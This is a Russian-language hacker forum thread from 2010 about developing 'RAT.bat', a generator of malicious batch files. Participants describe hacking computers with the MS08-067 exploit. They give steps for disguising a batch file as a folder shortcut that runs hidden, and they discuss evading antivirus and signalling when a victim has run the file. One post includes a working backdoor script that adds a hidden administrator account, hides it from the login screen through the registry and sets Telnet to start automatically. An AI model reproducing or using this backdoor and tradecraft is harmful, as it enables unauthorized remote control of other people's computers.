RAT.bat [проект временно закрыт]
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Генератор бат вирусов - 2010-12-13 17:54:23.276666
|
|
|
2serg2
Сообщений: 14
Оценки: 0
Присоединился: 2007-09-02 08:12:13.910000
|
Поясни для таких новичков как я, что это за функция «Получить IP на сниффер», что за код вставляется? И для чего нужна кнопка «Социальная инженерия»? За программу спасибо, может пригодится.
|
|
|
RE: Генератор бат вирусов - 2010-12-13 18:37:10.413333
|
|
|
MicroXaker
Сообщений: 1772
Оценки: 45
Присоединился: 2010-11-08 16:42:18.190000
|
[deleted]
|
|
|
RE: Генератор бат вирусов - 2010-12-13 23:50:45.560000
|
|
|
MicroXaker
Сообщений: 1772
Оценки: 45
Присоединился: 2010-11-08 16:42:18.190000
|
[deleted]
|
|
|
RE: Генератор бат вирусов - 2010-12-14 15:53:48.066666
|
|
|
vanoshef2010
Сообщений: 53
Оценки: 0
Присоединился: 2010-07-03 13:53:42.540000
|
MicroXaker классная вещь
|
|
|
RE: Генератор бат вирусов - 2010-12-14 15:58:58.800000
|
|
|
2serg2
Сообщений: 14
Оценки: 0
Присоединился: 2007-09-02 08:12:13.910000
|
hacker-pro.net/sniffer – про такие сайты никогда не слышал. Обязательно для себя разберусь, что к чему. Предложения такие: 1) Можно добавить кнопку, которая будет делать батник для английских версий Windows. Я с таким сталкивался, запускаю батник, а он меня в группу Администраторы не добавляет. 2) Насчёт социальной инженерии было бы не плохо, эту прогу объединить с эксплоитом для взлома ms08-067 (Metasploit Framework 3.3.3), но тогда желательно и ftp сервер встроить. Я этим эксплоитом компы ломаю, запускаю у себя ftp-сервер, копирую туда батник, а потом запускаю. Если кто знает посвежей уязвимость аналогичную ms08-067, напишите, помогите новичкам ламеров наказать. 3)Желательно справку к программке присобачить. 4)Можно добавить функцию для выбора порта для telnet. Типо 23 порт по умолчанию, если хотите, то можете его изменить. 5)Естественно функция для ввода «Имени пользователя» и «пароля». 6)Ещё по поводу социальной инженерии, вот скрытый способ запуска bat-файла, который я в журнале «Хакер» вычитал: а) Создай ярлык для bat-файла. б) В поле «Объект:» пиши «%windir%\system32\cmd.exe /c ТВОЙ_БАТНИК.bat», в поле «Рабочая папка» — «%currentdir%» все, естественно, без кавычек. с) Теперь для пущей привлекательности неплохо было бы сменить иконку нашему ярлыку. Для этого жми «Сменить значок…» и вводи в поиск «%SystemRoot%\system32\ SHELL32.dll» и выбирай понравившийся (например папку). д) Чтобы не выскакивало чёрное окно командной строки в поле «Окно:» выбери «Свёрнутое в значок». Если в «Социальную инженерию» вставить функцию из батника .exe сделать, то, возможно, его скоро внесут в антивирусные базы.
|
|
|
RE: Генератор бат вирусов - 2010-12-14 18:12:50.056666
|
|
|
MicroXaker
Сообщений: 1772
Оценки: 45
Присоединился: 2010-11-08 16:42:18.190000
|
2serg2, молодец. Пока буду разбираться с 4, 5 и 6-ым пунктами.
|
|
|
RE: Генератор бат вирусов - 2010-12-14 18:20:44.390000
|
|
|
MicroXaker
Сообщений: 1772
Оценки: 45
Присоединился: 2010-11-08 16:42:18.190000
|
2serg2, ты Delphi знаешь?
|
|
|
RE: Генератор бат вирусов - 2010-12-16 04:44:54.413333
|
|
|
2serg2
Сообщений: 14
Оценки: 0
Присоединился: 2007-09-02 08:12:13.910000
|
Delphi, и вообще никаких языков программирования не знаю. Объясни, зачем удаляется этот пользователь, нафига эти команды? net user SUPPORT_388945a0 /delete net localgroup Пользователи SUPPORT_388945a0 /del И зачем эта строка, ведь и без неё всё работает? sc start tlntsvr
|
|
|
RE: Генератор бат вирусов - 2010-12-16 10:53:39.180000
|
|
|
MicroXaker
Сообщений: 1772
Оценки: 45
Присоединился: 2010-11-08 16:42:18.190000
|
quote:
net user SUPPORT_388945a0 /delete net localgroup Пользователи SUPPORT_388945a0 /del В принципе, эти команды можно убрать. А вот sc start tlntsvr должно быть, ведь эта строка запускает Telnet-сервер.
|
|
|
RE: Генератор бат вирусов - 2010-12-16 13:19:15.143333
|
|
|
2serg2
Сообщений: 14
Оценки: 0
Присоединился: 2007-09-02 08:12:13.910000
|
quote:
А вот sc start tlntsvr должно быть, ведь эта строка запускает Telnet-сервер. Не понимаю зачем две команды рядом sc start tlntsvr net start Telnet Я использовал в своём батнике только вторую команду и всё сразу работало.
|
|
|
RE: Генератор бат вирусов - 2010-12-16 19:16:43.666666
|
|
|
MicroXaker
Сообщений: 1772
Оценки: 45
Присоединился: 2010-11-08 16:42:18.190000
|
Ну может быть и будет работать, если тебе так сильно мешает эта строчка могу убрать)) Что еще можно добавить в прогу? Что изменить? И кто попытается помочь? P.S. Добавлю потом кнопку вопроса, рядом с закрытием и напишу там разработчиков (или разработчика, в зависимости от помощников!)
|
|
|
RE: Генератор бат вирусов - 2010-12-18 20:11:32.280000
|
|
|
2serg2
Сообщений: 14
Оценки: 0
Присоединился: 2007-09-02 08:12:13.910000
|
Было бы неплохо реализовать функцию, сделать из батника ехе-файл, с указанием какой-нибудь иконки.
|
|
|
RE: Генератор бат вирусов - 2010-12-18 21:52:20.603333
|
|
|
MicroXaker
Сообщений: 1772
Оценки: 45
Присоединился: 2010-11-08 16:42:18.190000
|
quote:
Было бы неплохо реализовать функцию, сделать из батника ехе-файл, с указанием какой-нибудь иконки. Если бы я мог, я бы это давно уже сделал, но проблема в том, что я не знаю, как именно добиться компиляции в ехе. Недумаю, что поможет обычная смена расширения, а о иконке, не имею вообще никакого представления! Помогайте!
|
|
|
RE: Генератор бат вирусов - 2010-12-18 22:30:07.940000
|
|
|
Flint_ta
Сообщений: 3720
Оценки: 1120
Присоединился: 2007-01-26 15:49:18.323333
|
quote:
я не знаю, как именно добиться компиляции в ехе никак
|
|
|
RE: Генератор бат вирусов - 2010-12-18 22:58:44.763333
|
|
|
MicroXaker
Сообщений: 1772
Оценки: 45
Присоединился: 2010-11-08 16:42:18.190000
|
quote:
никак Почему это никак? Аргументируй!
|
|
|
RE: Генератор бат вирусов - 2010-12-18 23:19:39.090000
|
|
|
Flint_ta
Сообщений: 3720
Оценки: 1120
Присоединился: 2007-01-26 15:49:18.323333
|
Потому что бат - это текстовый файл, содержащий команды. Команды выполняются интерпретатором (другой программой, которая эти команды понимает). Без интерпретатора (удалим command.com и cmd.exe) бат файл бесполезен. Компиляция - трансляция программы на язык процессора (читай на ассемблер).
|
|
|
RE: Генератор бат вирусов - 2010-12-18 23:30:38.823333
|
|
|
MicroXaker
Сообщений: 1772
Оценки: 45
Присоединился: 2010-11-08 16:42:18.190000
|
Это я знаю! Но есть же для этого специальные программы, например Quick Batch File Compiler. А в некоторых генераторах бат-вирусов уже есть такая функция… quote:
Потому что бат - это текстовый файл, содержащий команды. Команды выполняются интерпретатором (другой программой, которая эти команды понимает). Без интерпретатора (удалим command.com и cmd.exe) бат файл бесполезен. Компиляция - трансляция программы на язык процессора (читай на ассемблер). Ты забыл написать о структуре исполняемых файлов))
|
|
|
RE: Генератор бат вирусов - 2010-12-18 23:40:31.210000
|
|
|
Flint_ta
Сообщений: 3720
Оценки: 1120
Присоединился: 2007-01-26 15:49:18.323333
|
А ты уверен что твой "Quick Batch File Compiler" не банальный дропер, который скидывает в конце концов оригинальный бат файл на диск? )) quote:
Ты забыл написать о структуре исполняемых файлов)) Это я запросто, но пока не требуется.
|
|
|
RE: Генератор бат вирусов - 2010-12-18 23:44:49.610000
|
|
|
MicroXaker
Сообщений: 1772
Оценки: 45
Присоединился: 2010-11-08 16:42:18.190000
|
quote:
А ты уверен что твой "Quick Batch File Compiler" не банальный дропер Уверен. И опять же повторюсь, в некоторых генераторах бат-вирусов уже есть такая функция. Могу ссылку даже дать.
|
|
|
RE: Генератор бат вирусов - 2010-12-18 23:47:07.213333
|
|
|
MicroXaker
Сообщений: 1772
Оценки: 45
Присоединился: 2010-11-08 16:42:18.190000
|
Flint_ta, если ты Delphi знаешь, помоги дописать прогу.
|
|
|
RE: Генератор бат вирусов - 2010-12-18 23:49:01.443333
|
|
|
Flint_ta
Сообщений: 3720
Оценки: 1120
Присоединился: 2007-01-26 15:49:18.323333
|
лучше дай уже "скомпилированные" ими exe файлы. Для теста возьмем простенький файл сл. содержания
@echo off
echo test it
pause
Делфе не знаю, я вообще не программист )))
|
|
|
RE: Генератор бат вирусов - 2010-12-18 23:56:04.146666
|
|
|
MicroXaker
Сообщений: 1772
Оценки: 45
Присоединился: 2010-11-08 16:42:18.190000
|
Вот http://www.sendspace.com/file/rzu3sn
|
|
|
RE: Генератор бат вирусов - 2010-12-19 00:12:42.230000
|
|
|
MicroXaker
Сообщений: 1772
Оценки: 45
Присоединился: 2010-11-08 16:42:18.190000
|
Т.е. он копирует батник глубоко в винду и запускает?
|
|
|
RE: Генератор бат вирусов - 2010-12-19 00:15:35.343333
|
|
|
Flint_ta
Сообщений: 3720
Оценки: 1120
Присоединился: 2007-01-26 15:49:18.323333
|
Не глубоко в винду, а во временные файлы (Temp). Толку от него никакого.
|
|
|
RE: Генератор бат вирусов - 2010-12-19 00:20:30.346666
|
|
|
MicroXaker
Сообщений: 1772
Оценки: 45
Присоединился: 2010-11-08 16:42:18.190000
|
Ну а ты его запускать пробовал?
|
|
|
RE: Генератор бат вирусов - 2010-12-19 00:23:59.606666
|
|
|
Flint_ta
Сообщений: 3720
Оценки: 1120
Присоединился: 2007-01-26 15:49:18.323333
|
Дык, а что это меняет, ежу понятно оно запустится. Если бат файл будет палится аверами, то "компиляция" и последующий крипт ничего не даст, т.к. в конце концов оригинальный файл будет сброшен на диск.
|
|
|
RE: Генератор бат вирусов - 2010-12-19 00:31:33.043333
|
|
|
MicroXaker
Сообщений: 1772
Оценки: 45
Присоединился: 2010-11-08 16:42:18.190000
|
Ясно. Тогда эта функция не нужна!
|
|
|
RE: Генератор бат вирусов - 2010-12-19 00:32:10.780000
|
|
|
MicroXaker
Сообщений: 1772
Оценки: 45
Присоединился: 2010-11-08 16:42:18.190000
|
Но иконку все равно надо приделывать, а к бату не получится…
|
|
|
RE: Генератор бат вирусов - 2010-12-19 07:12:12.650000
|
|
|
2serg2
Сообщений: 14
Оценки: 0
Присоединился: 2007-09-02 08:12:13.910000
|
Иконку к батнику можно прикрепить только таким способом, как я выше написал. Короче, программа достигла совершенства. Лично я таким батником telnet на взломанном компьютере запускаю, так что лучше убери лишние команды. К тому же будет повод новую версию проги выпустить.:) chcp 1251 net user support 1 /add net localgroup Администраторы support /add reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v support /t reg_dword /d 0 /f sc config tlntsvr start= auto net start Telnet Есть ещё маленькая идейка. Допустим, копируешь жертве в открытую папку в сети батник (естественно с параметрами скрытый, системный) и ярлык для него. Ярлык настроен как у тебя в Скрытом запуске написано. Но как узнать запустил он файл или нет? Может, он запустил, но фаервол не даёт подключиться или сам пользователь после вручную пошёл и остановил сервис Telnet. Предложение такое: нужно сделать так, чтобы после запуска bat-файла в этой же папке появлялся какой-нибудь файл, можно даже без расширения (с атрибутами скрытый системный). Ты заходишь в папку и видишь, запускался наш батник или нет. =================================== Вот ещё 2 статьи, как подключиться удалённо к компу без всяких троянов средствами WINDOWS: Превращение WIN-XP-SP2 в сервер терминалов (или троян от Мелкомягких) http://forum.antichat.ru/thread36042.html Windows XP как сервер терминалов http://www.xakep.ru/post/28531/default.asp MicroXaker, может, ты ещё для этих статей программку напишешь? Там главное dll-ки в Windows заменить и сделать так чтобы окошки Винда не выкидовала, «Караул!!! Спасите!!! Мне системные фалы пытаются заменить».
|
|
|
RE: Генератор бат вирусов - 2010-12-19 11:58:46.403333
|
|
|
MicroXaker
Сообщений: 1772
Оценки: 45
Присоединился: 2010-11-08 16:42:18.190000
|
quote:
Предложение такое: нужно сделать так, чтобы после запуска bat-файла в этой же папке появлялся какой-нибудь файл, можно даже без расширения (с атрибутами скрытый системный). Ты заходишь в папку и видишь, запускался наш батник или нет. Ты хочешь так, чтобы ты мог узнать, когда жертва запустила батник? Тогда можно отправлять текстовый документ на FTP с таким содержанием "Жертва запустила батник". Так пойдёт?
|
|
|
RE: Генератор бат вирусов - 2010-12-19 19:09:07.113333
|
|
|
2serg2
Сообщений: 14
Оценки: 0
Присоединился: 2007-09-02 08:12:13.910000
|
quote:
ORIGINAL: MicroXaker Ты хочешь так, чтобы ты мог узнать, когда жертва запустила батник? Тогда можно отправлять текстовый документ на FTP с таким содержанием "Жертва запустила батник". Так пойдёт? На ftp не всегда получится. У меня, например, Интернет через прокси-сервер. Я имел ввиду в конце дописать команду, которая создаст тут же в папке какой-нибудь файл. Ты заходишь и смотришь, файл есть, значит батник запустили. Но это не обязательно, кому нужно может в конце сам дописать.
|
|
|
RE: Генератор бат вирусов - 2010-12-19 20:34:24.333333
|
|
|
MicroXaker
Сообщений: 1772
Оценки: 45
Присоединился: 2010-11-08 16:42:18.190000
|
quote:
Ты заходишь и смотришь Что значит, ты заходишь и смотришь? А если нет физического доступа к компьютеру?
|
|
|
RE: Генератор бат вирусов - 2010-12-20 06:03:33.130000
|
|
|
2serg2
Сообщений: 14
Оценки: 0
Присоединился: 2007-09-02 08:12:13.910000
|
На тот случай если есть доступ к какой-нибудь открытой папке в сети. Я же писал выше для какого способа взлома это нужно.
|
|
|
RE: Генератор бат вирусов - 2010-12-20 08:01:28.590000
|
|
|
Apple996
Сообщений: 19
Оценки: 0
Присоединился: 2010-12-18 18:28:59.783333
|
спасибо
|
|
|
RE: Генератор бат вирусов - 2010-12-20 21:19:51.073333
|
|
|
MicroXaker
Сообщений: 1772
Оценки: 45
Присоединился: 2010-11-08 16:42:18.190000
|
quote:
Я же писал выше для какого способа взлома это нужно. Совсем не обязательно иметь расшаренную папку у жертвы.
|
|
|
Новая версия!!! - 2010-12-22 23:18:57.043333
|
|
|
MicroXaker
Сообщений: 1772
Оценки: 45
Присоединился: 2010-11-08 16:42:18.190000
|
Доступна для скачивания версия 2.0 Новое: 1. Опять же изменён скин)) 2. Функция самоликвидации батника 3. Добавлена кнопка "О программе" 4. Добавлены некоторые интересные команды в Telnet'е 5. Теперь можно изменять исходный код бат-вируса в главном окошке. 6. Переработана кнопка "Telnet" (изменён код) Скачать P.S. На выходных ждите 2.1, будет одна классная функция + добавлю в "Бета-тестирование, идеи" пользователя Flint_ta
|
|
|
RE: Новая версия!!! - 2010-12-22 23:32:53.533333
|
|
|
MicroXaker
Сообщений: 1772
Оценки: 45
Присоединился: 2010-11-08 16:42:18.190000
|
Тестируйте пока эту…
|
|
|
|
|